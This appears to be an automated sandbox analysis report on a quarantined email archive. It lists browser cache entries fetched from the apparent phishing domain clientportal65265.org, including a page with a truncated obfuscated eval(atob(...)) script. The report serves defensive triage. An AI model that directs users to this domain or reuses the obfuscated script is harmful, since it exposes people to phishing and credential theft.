                SHA1:84F3F8196A5064A78403D977D71854E5E7E5C5C3
                SHA-256:00445F0D9637937AA5BA02E0185ABB0E2B41024C8CA37264C898DFBEDF94CC72
                SHA-512:55C6F5DE3548D6FD174E008941A6B7BDE075E90B4CB3A7DC78781D44A46C274DB05545A92E83CC78BA3BF0CA7D1209264476C499A0EB7BB46FF08E91319EDDAD
                Malicious:false
                Reputation:unknown
                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cc5e6995ff01996/1727884780351/veSsKOP5pCdASrt
                Preview:.PNG........IHDR.......d............IDAT.....$.....IEND.B`.

                Chrome Cache Entry: 79

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                Category:downloaded
                Size (bytes):452
                Entropy (8bit):7.0936408308765495
                Encrypted:false
                SSDEEP:
                MD5:C33DE66281E933259772399D10A6AFE8
                SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/cdn-cgi/images/icon-exclamation.png?1376755637
                Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.

                Chrome Cache Entry: 80

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with CRLF line terminators
                Category:downloaded
                Size (bytes):564
                Entropy (8bit):4.702540958385578
                Encrypted:false
                SSDEEP:
                MD5:4DEC45889E09EC3CEB63FD65825D0F11
                SHA1:D80EAF048573A410CB6C49EBB859280D04B6113C
                SHA-256:CAB538FD1647961EB35348C1BD84E1FDE389AD89672587D2FE3C007A0BC9E67F
                SHA-512:6BA9CC945B78B1C1F7B80A2BC3C0D48D3E1C5FC2A481FADA4E9018622664FB7423623B3563A6236BF105621E4A907A9957AF421EF67783F3DC1194B9BC308C7B
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/favicon.ico
                Preview:<html>..<head><title>403 Forbidden</title></head>..<body bgcolor="white">..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

                Chrome Cache Entry: 81

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (24050)
                Category:downloaded
                Size (bytes):24051
                Entropy (8bit):4.941039417164537
                Encrypted:false
                SSDEEP:
                MD5:5E8C69A459A691B5D1B9BE442332C87D
                SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/cdn-cgi/styles/cf.errors.css
                Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w

                Chrome Cache Entry: 82

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (47261)
                Category:downloaded
                Size (bytes):47262
                Entropy (8bit):5.3974731018213795
                Encrypted:false
                SSDEEP:
                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                Malicious:false
                Reputation:unknown
                URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit
                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                Chrome Cache Entry: 84

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with very long lines (5949)
                Category:downloaded
                Size (bytes):7383
                Entropy (8bit):5.696713832821179
                Encrypted:false
                SSDEEP:
                MD5:7BED9202592729236800F9789A71EC9F
                SHA1:76F8A3D9B39D86FF4952BAB58959B41E77087BB3
                SHA-256:CEB8D9F64B67C1A510D491269DBB24B713BCE6A05E21125F666089822D2899E2
                SHA-512:17E600E37F1118E6E65D68F10C87C8EECEE6C4E343156C271C47E20E56A67902488AFADDC78208CC75778CA3921F13B32C085F32BA80274AEF5926B942529318
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/salimre/agg.php
                Preview:<!DOCTYPE html>.<html>.<head>.<meta charset="utf-8" />.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />.<meta name="robots" content="noindex, nofollow" />. Start: Ad code and script tags for header of page -->. End: Ad code and script tags for header of page -->.<script type="text/javascript" charset="utf-8" data-cfasync="false">eval(decodeURIComponent(escape(window.atob('KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZ

                Chrome Cache Entry: 87

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (8045), with no line terminators
                Category:downloaded
                Size (bytes):8045
                Entropy (8bit):5.7904643014786386
                Encrypted:false
                SSDEEP:
                MD5:70E0755FA3824FC862C68646859B67B6
                SHA1:B428C2DDF9F91E41AF661401607A88485DF117B7
                SHA-256:78D81172DD8824025018B9AFD2FE355EB7D4382F06A25D193D0D705D2C5A8F18
                SHA-512:A771A7F924C2B1929215DBD863EA12883C84589353792252E590F91B07D968E6D4ECFE4E6612DE6F61B8960AD6D5CD34737EC761C25508B4793EF7060867DCF5
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?
                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,f,g,h,m,n,x,y){V=b,function(c,d,U,B,C){for(U=b,B=c();!![];)try{if(C=parseInt(U(293))/1*(parseInt(U(337))/2)+-parseInt(U(362))/3*(parseInt(U(286))/4)+-parseInt(U(310))/5*(-parseInt(U(313))/6)+parseInt(U(354))/7+parseInt(U(322))/8*(-parseInt(U(343))/9)+parseInt(U(308))/10+-parseInt(U(304))/11,C===d)break;else B.push(B.shift())}catch(D){B.push(B.shift())}}(a,814262),f=this||self,g=f[V(292)],h=function(W,d,B,C){return W=V,d=String[W(314)],B={'h':function(D){return null==D?'':B.g(D,6,function(E,X){return X=b,X(349)[X(307)](E)})},'g':function(D,E,F,Y,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(Y=W,null==D)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[Y(271)];Q+=1)if(R=D[Y(307)](Q),Object[Y(258)][Y(340)][Y(347)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[Y(258)][Y(340)][Y(347)](H,S))J=S;else{if(Object[Y(258)][Y(340)][Y(347)](I,J)){if(256>J[Y(321)](0)){for(G=0;G<M;O<<=1,P==E-1?(P=0,N[Y(365)](F(O)),O=0):P++,G++);for(T=J[Y(321)](0),G=0;8>G;O=T&1|O<<1,P==E

                Chrome Cache Entry: 88

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (8052), with no line terminators
                Category:dropped
                Size (bytes):8052
                Entropy (8bit):5.75112694648969
                Encrypted:false
                SSDEEP:
                MD5:305844A765728285B260546E16EAF202
                SHA1:21B604B122BFB86D387ECE36BCDB6D910AD08974
                SHA-256:FAC005CEF602FD4B9D36380366C91F2257B749FEF5CEAF2B247B4945776253E0
                SHA-512:D1C697EA06981C53602DCA96B5EBEFA28E00CA37B7E18F61C2E77179ACB5054B70B2C0583DA4D7DC0550B3814B8D9FB8E637F045345BD925A83084977F51CF04
                Malicious:false
                Reputation:unknown
                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,i,j,n,o,A){V=b,function(d,e,U,f,C){for(U=b,f=d();!![];)try{if(C=-parseInt(U(330))/1*(-parseInt(U(348))/2)+parseInt(U(308))/3*(-parseInt(U(364))/4)+parseInt(U(347))/5+parseInt(U(329))/6*(-parseInt(U(382))/7)+parseInt(U(311))/8+-parseInt(U(304))/9*(-parseInt(U(326))/10)+parseInt(U(303))/11,e===C)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,116560),g=this||self,h=g[V(346)],i={},i[V(380)]='o',i[V(343)]='s',i[V(370)]='u',i[V(388)]='z',i[V(306)]='n',i[V(317)]='I',j=i,g[V(355)]=function(C,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D||void 0===D)return F;for(H=m(D),C[a0(298)][a0(310)]&&(H=H[a0(359)](C[a0(298)][a0(310)](D))),H=C[a0(338)][a0(350)]&&C[a0(295)]?C[a0(338)][a0(350)](new C[(a0(295))](H)):function(N,a1,O){for(a1=a0,N[a1(293)](),O=0;O<N[a1(362)];N[O]===N[O+1]?N[a1(369)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(377)][a0(325)](I),J=0;J<H[a0(362)];K=H[J],L=l(C,D,K),I(L)?(M=L==='s'&&!C[a0(305)](D[K]),a0(282)===E+K?G(E+K

                Static File Info

                General

                File type:Zip archive data, at least v4.5 to extract, compression method=deflate
                Entropy (8bit):7.981944910097865
                TrID:
                • ZIP compressed archive (8000/1) 100.00%
                File name:Quarantined Messages(9).zip
                File size:13'903 bytes
                MD5:d0b2e490900517e47d99b92fadd6782f
                SHA1:ef7b644648092578a3890c1f945ed043d22e61f3
                SHA256:a84ad5387dd4803a60f346fc190ee587fe4da91c90df0f70f8e2ae83a51b1242
                SHA512:b0d50ddaff6e1718c91ec5ad5aa745752b361de28d046e85cfdc6e216c3904713a584089d54691833d49c2d3eb96b845b237f744ea5bb2414b9f867f00d38ffa
                SSDEEP:384:rCpDRWcJfJLItQ//MSx1mdg4gaGYAOq0PstRS2SkFWzy2BTkG:eFVLItOlx1GgaOOzPsvnFA
                TLSH:C452D1DEF1ED6D02D8BD29B91DD43C27A7EE14C586816C5154E0B0CB1A9005673FBB0B
                File Content Preview:PK..-..... .BYZ...........M...c2a65c0a-d2ae-4eac-21cd-08dce2de9da7/ef3049e0-344c-9ead-ea49-53e550940a43.eml.............5......@...V..xc`k$...E..k.]_...k.e".@.....kh..E...,..R..K-._...N...o..$..jZ.b.E[..M...zxR...... M\..(/.52.2...rH..u]..r....n."&......u

                File Icon

                Icon Hash:1c1c1e4e4ececedc